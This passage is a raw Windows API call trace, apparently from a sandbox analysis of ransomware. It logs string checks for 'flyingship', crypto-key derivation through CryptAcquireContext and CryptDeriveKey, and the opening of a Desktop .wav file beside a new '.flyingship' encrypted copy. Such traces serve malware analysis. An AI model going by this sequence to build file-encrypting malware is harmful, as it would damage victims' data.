HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gx8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HB3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="amX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mX5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sO9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SwzMc.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.628] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.628] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0161.628] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0161.628] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0161.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0161.628] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0161.628] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0161.628] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0161.628] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0161.629] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.629] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20d25ab0, ftCreationTime.dwHighDateTime=0x1d5dd70, ftLastAccessTime.dwLowDateTime=0xbb9f920, ftLastAccessTime.dwHighDateTime=0x1d5d7fe, ftLastWriteTime.dwLowDateTime=0xbb9f920, ftLastWriteTime.dwHighDateTime=0x1d5d7fe, nFileSizeHigh=0x0, nFileSizeLow=0x10f89, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="gx8HB3O7amX5sO9SwzMc.wav", cAlternateFileName="GX8HB3~1.WAV")) returned 0x90af58 [0161.629] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0161.629] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.629] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0161.629] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.629] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.629] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0161.629] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.629] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0161.629] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.629] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.629] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0161.629] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.629] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.630] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c00) returned 1 [0161.630] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0161.631] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0161.631] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0161.631] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0161.631] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.631] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0161.631] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.631] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0161.631] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.631] CryptCreateHash (in: hProv=0x9c0c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0161.631] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0161.631] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.631] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.631] CryptHashData (hHash=0x90ae18, pbData=0x8df1e0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0161.631] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.631] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0161.631] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.631] CryptDeriveKey (in: hProv=0x9c0c00, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0161.631] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.631] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.631] CryptDestroyHash (hHash=0x90ae18) returned 1 [0161.632] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gx8hb3o7amx5so9swzmc.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0161.632] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.632] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0161.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0161.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0161.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0161.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0161.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0161.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0161.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0161.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0161.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0161.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0161.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0161.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0161.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0161.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0161.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0161.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0161.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0161.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0161.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0161.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0161.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0161.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0161.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0161.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0161.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0161.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0161.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0161.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0161.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0161.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0161.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0161.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0161.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0161.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0161.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0161.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0161.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0161.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0161.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0161.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0161.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0161.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0161.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0161.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0161.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0161.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0161.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0161.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0161.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0161.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0161.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0161.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0161.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0161.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0161.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0161.634] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0161.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0161.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0161.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0161.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0161.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0161.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa95010 [0161.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0161.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0161.635] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.flyingship.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gx8hb3o7amx5so9swzmc.flyingship.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0161.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0161.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0161.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0161.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0161.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0161.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0161.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0161.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0161.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0161.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0161.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0161.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0161.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0161.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0161.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0161.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0161.637] RtlAllocateHeap (HeapHandle=0x8a0000, 